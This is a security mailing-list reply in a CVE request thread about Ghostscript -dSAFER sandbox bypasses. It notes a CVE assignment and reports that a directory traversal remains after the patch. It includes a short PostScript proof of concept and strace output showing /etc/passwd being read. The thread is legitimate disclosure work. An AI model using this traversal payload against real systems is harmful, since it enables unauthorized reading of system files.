Re: Re: CVE Request - multiple ghostscript -dSAFER sandbox problems

[Cedric Buissart <cbuissar () redhat com>]

On Wed, Oct 5, 2016 at 8:04 PM, <cve-assign () mitre org> wrote:

> > bug: various userparams allow %pipe% in paths, allowing remote shell
> > command execution.
> > id: http://bugs.ghostscript.com/show_bug.cgi?id=697178
> > repro: http://www.openwall.com/lists/oss-security/2016/09/30/8
> > patch: http://git.ghostscript.com/?p=user/chrisl/ghostpdl.git;h=
> 71ac87493b1e445d6c07554d4246cf7d4f44875c
>
> Use CVE-2016-7976.
>
> There currently isn't a separate CVE ID for the earlier impact that
> occurred when "b" was in the mode argument to popen. The question of
> whether popen will execute anyway (even with the 'b" character) is,
> more or less, a reachability concern in this context, and doesn't mean
> that a second vulnerability needs to be defined.
>
> The original report for this bug (http://bugs.ghostscript.com/
show_bug.cgi?id=697178), as described by Florian, was mentioning a
directory traversal issue.
The directory traversal does not appear to be resolved after applying the
given patch :

$ cat putdevice-open.ps
%!PS
currentdevice null true mark /OutputICCProfile (../../../../../etc/passwd)
.putdeviceparams
quit
$ strace -f -e open gs -dSAFER putdevice-open.ps |& grep passwd
open("/usr/share/ghostscript/9.20/iccprofiles/../../../../../etc/passwd",
O_RDONLY) = 6

Is it expected ?

-- 
Cedric Buissart,
Product Security